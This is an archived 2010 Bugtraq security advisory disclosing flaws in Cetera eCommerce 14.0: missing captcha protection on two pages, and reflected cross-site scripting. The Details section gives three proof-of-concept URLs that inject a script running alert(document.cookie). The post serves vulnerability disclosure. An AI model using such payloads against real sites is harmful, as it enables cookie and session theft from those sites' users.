28 Jul 19:00
Vulnerabilities in Cetera eCommerce
MustLive <mustlive <at> websecurity.com.ua>
2010-07-28 17:00:22 GMT
2010-07-28 17:00:22 GMT
Hello Bugtraq! I want to warn you about security vulnerabilities in Cetera eCommerce. Which I disclosed already in December 2009 (SecurityVulns ID: 10489). ----------------------------- Advisory: Vulnerabilities in Cetera eCommerce ----------------------------- URL: http://websecurity.com.ua/3640/ ----------------------------- Affected products: Cetera eCommerce 14.0 and previous versions. ----------------------------- Timeline: 01.03.2009 - found vulnerabilities. 30.10.2009 - announced at my site. 31.10.2009 - informed developers. 23.12.2009 - disclosed at my site. ----------------------------- Details: These are Insufficient Anti-automation and Cross-Site Scripting vulnerabilities. Insufficient Anti-automation: http://site/ http://site/account/ There is no protection against automated requests (captcha) in forms at these pages. XSS: http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
RSS Feed